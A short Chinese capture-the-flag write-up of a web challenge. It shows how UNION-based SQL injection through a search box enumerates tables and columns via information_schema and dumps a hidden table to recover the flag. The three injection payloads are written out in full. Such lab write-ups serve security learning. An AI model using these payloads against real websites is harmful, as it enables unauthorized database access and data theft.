题目分析
打开题目中所给出的链接,发现有一个搜索框,在其中输入,都会得到与输入有关的结果。由此猜测搜索框对应的SQL语句为:
select * from news_table where news like '输入'
解题过程
在搜索框中输入
wy'union select 1,2,group_concat(table_name) from information_schema.tables;#
得到结果为
查看网页源代码,发现flag可能存在于f1agfl4gher3这个表中
尝试SQL注入,,在搜索框中输入:
flag' union select 1,2,COLUMN_NAME from information_schema.COLUMNS where table_name = 'f1agfl4gher3';#
得到结果为:
可以从上图中看到,f1agfl4gher3表的字段名为id和h3r31sfl4g。
再次尝试SQL注入,由id和h3r31sfl4g获取f1agfl4gher3表的所有字段值:
flag' union select 1,id,h3r31sfl4g from f1agfl4gher3;#
得到flag为flag{sql_information_schema_hack}
